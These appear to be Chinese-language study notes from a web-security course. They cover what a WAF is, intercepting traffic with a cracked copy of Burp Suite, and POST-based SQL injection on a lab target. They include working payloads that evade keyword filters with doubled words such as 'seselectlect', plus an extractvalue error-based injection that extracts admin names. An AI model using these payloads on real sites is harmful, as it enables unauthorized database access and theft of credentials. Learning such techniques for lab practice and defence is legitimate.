一、WAF:Web应用防火墙
??? 是通过执行一系列针对http/https的安全策略来专门为Web应用提供保护的一款产品。
??? 工作在应用层,对来自Web应用程序客户端的各类请求进行内容检测和验证。
二、post和报错注入【配备的靶场叫?? 绕过防护getshell】
1、什么是post注入
?? post传参,注入点在post数据包中。
2、burp安装配置【burpsuite】
?? 原理:浏览器和相关应用程序的中间 拦截、修改、重放数据包的? 代理工具【中间插一杠子】。
???????? 拦截IP+port传的数据包。
?? 工具:burpsuite pro v2.1.jar? 需要1.8版本的jdk
?? 使用:需要使用破解版(loader-keygen)去调用本体版(burpsuite pro)
???????????? 直接双击破解版的jar文件就可运行,若运行不成功,可以在cmd中java -jar 破解版的jar。
? ??? ?????? 打开后,Proxy代理标签页的Options属性,默认拦截的IP+port。
?? ??????? ? 方式一:打开火狐浏览器,选项中搜索代理,设置为手动代理(http代理,IP+port)。
??????????? 方式二:打开火狐浏览器,扩展和主题,选择扩展,搜索proxy,选择 FoxyProxy Standard,安装完成后,会显示在浏览器的右上角,点击选项--》添加,起个名字,配置代理。
??????? ? ? 双方配置好代理后,Proxy代理标签页的Intercept属性,Intercept is on是开始抓包;off是关闭抓包。
??????????? forward:对抓到的包进行放行;Drop:直接丢弃抓到的包,客户端得不到响应;
??????????? Action:对找到的包进行处理【点击可以选择具体如何处理】。
??????????? 如:Send to Repeater,他会把当前抓的包,复制一份放到Repeater标签页中,以便多次尝试报错点。
?????? ? ?? Repeater中的Go表示放行该包。
??????????? user=test6667' un union ion select 1,2,3,4,5 【order by6,字符型注入判断,user=test6667'】
???????? ——对union进行了过滤,组装出来一个union
???????? ——对select进行了过滤,组装一个select出来, seselectlect
???????? https请求时,需要安装证书,确认burp开启时,在浏览器中输入? IP:port 访问后,点击右上角的 CA? Certificat 下载证书,可以参照 https://www.cnblogs.com/aq-ry/p/9336365.html
?????????????????
3、报错注入【非法路径报错,路径中拼接~或!】【数据库报错提醒】
??? 原理:把我们想要的内容以报错的形式展示出来。
??? select extractvalue(1,concat('~',(select database())))
??? extractvalue(目标xml文档,xml路径):对XML文档进行查询的函数
??? 路径不能出现非法路径,否则会报错,如:select extractvalue(1,0x7e)
??? 注意:0x7e 是~的十六进制
??? concat(str1,str2,...):将多个字符串链接成一个字符串
??? 如: select concat('~',(select database()))
??? select extractvalue(1,concat(1,(select database())))?? ?
??? user=test6667' and -- suibian &password=test6667
??? user=test6667'a and nd extractvalue(1,concat(0x7e,(seselectlect admin_name fr from om bees_admin),0x7e))-- suibian & password=test667
??? ?
